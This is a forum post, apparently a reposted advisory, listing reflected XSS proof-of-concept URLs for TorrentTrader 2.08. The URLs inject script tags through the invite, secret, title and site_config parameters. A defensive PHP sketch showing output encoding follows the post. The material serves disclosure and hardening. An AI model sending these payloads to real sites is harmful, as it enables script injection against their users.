Thread: Reflected XSS
11th April 2019, 02:22
BamBam0077
Reflected XSS
###############################################################################
5. Reflected XSS in "account-signup.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "invite" and "secret"

PHP Code:
http://localhost/torrenttrader208/account-signup.php?invite_row=1&invite="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/account-signup.php?invite_row=1&secret="><script>alert(String.fromCharCode(88,83,83))</script>
###############################################################################
6. Reflected XSS in "/themes/default/header.php"
###############################################################################

Preconditions: "register_globals=on"
Attack Vector: User provided parameters "title" and "site_config"

PHP Code:
http://localhost/torrenttrader208/themes/default/header.php?title=</title><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[CHARSET]="><script>alert(String.fromCharCode(88,83,83))</script>
http://localhost/torrenttrader208/themes/default/header.php?site_config[SITEURL]=--><script>alert(String.fromCharCode(88,83,83))</script>
###############################################################################

Last edited by Thor; 14th April 2019 at 11:30. Reason: Edited Code to make it Readable
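
A defensive sketch for the two findings in the post above, added here as an illustration and not taken from the post or from TorrentTrader's source. The helper names (`h`, `request_param`, `render_header`), the `$trustedConfig` array and the sample values are hypothetical; the point is that parameters are read explicitly rather than through register_globals, configuration never comes from the request, and every value is encoded where it is written into HTML.

```php
<?php
// Added illustration; hypothetical names, not TorrentTrader's actual code.

// Encode for HTML text and quoted-attribute contexts: < > & " ' become entities.
function h($value, $charset = 'UTF-8')
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE, $charset);
}

// Read one parameter explicitly from a request array instead of letting
// register_globals turn arbitrary query-string keys into variables.
// Array-valued input (e.g. name[KEY]=...) is rejected outright.
function request_param(array $source, $name, $maxLen = 64)
{
    if (!isset($source[$name]) || !is_string($source[$name])) {
        return '';
    }
    return substr($source[$name], 0, $maxLen);
}

// Template fragment: configuration is passed in by the application, never
// taken from the request, and is still encoded on output.
function render_header(array $trustedConfig, $title)
{
    return '<meta charset="' . h($trustedConfig['CHARSET']) . '">' . "\n"
         . '<title>' . h($title) . '</title>' . "\n"
         . '<base href="' . h($trustedConfig['SITEURL']) . '">' . "\n";
}

// Constructed sample request using the parameter names from the post.
$sampleGet = [
    'invite' => '"><script>alert(String.fromCharCode(88,83,83))</script>',
    'secret' => 'constructed-sample-secret',
    'title'  => '</title><script>alert(String.fromCharCode(88,83,83))</script>',
];

// Constructed application configuration (server side only).
$trustedConfig = ['CHARSET' => 'UTF-8', 'SITEURL' => 'http://localhost/example/'];

echo render_header($trustedConfig, request_param($sampleGet, 'title', 128));

// Vulnerable pattern, for contrast: echo "<input value=\"$invite\">";
// Hardened pattern: encode at the point of output.
foreach (['invite', 'secret'] as $field) {
    echo '<input type="hidden" name="' . h($field) . '" value="'
       . h(request_param($sampleGet, $field)) . '">' . "\n";
}
```

Run with the PHP CLI, the markup comes out as inert entity-encoded text, so the quote and tag characters can no longer break out of the attribute or the `<title>` element.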